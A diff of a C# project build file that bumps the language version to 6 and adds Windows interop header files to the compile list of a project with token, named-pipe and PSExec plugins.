     <DebugType>pdbonly</DebugType>
     <PlatformTarget>x64</PlatformTarget>
-    <LangVersion>5</LangVersion>
+    <LangVersion>6</LangVersion>
     <ErrorReport>prompt</ErrorReport>
     <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
     <Prefer32Bit>true</Prefer32Bit>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release-Net45|x64'">
     <OutputPath>bin\x64\Release-Net45\</OutputPath>
-    <DefineConstants>TRACE</DefineConstants>
     <Optimize>true</Optimize>
     <DebugType>pdbonly</DebugType>
     <PlatformTarget>x64</PlatformTarget>
-    <LangVersion>5</LangVersion>
+    <LangVersion>6</LangVersion>
     <ErrorReport>prompt</ErrorReport>
     <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
   </PropertyGroup>
@@ -162,7 +116,9 @@
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Accctrl.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\lmaccess.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\lsalookup.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\ntbasic.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Ntdef.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\ntlpcapi.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\SecurityBaseApi.cs" />
     <Compile Include="Plugins\NamedPipes\NamedPipes.cs" />
     <Compile Include="Plugins\AccessTokens\TokenInformation.cs" />
@@ -187,6 +143,7 @@
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Winsvc.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Winternl.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Winuser.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Wnf.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\wudfwdm.cs" />
     <Compile Include="Plugins\Execution\PSExec.cs" />
     <Compile Include="Plugins\AccessTokens\TokenDriver.cs" />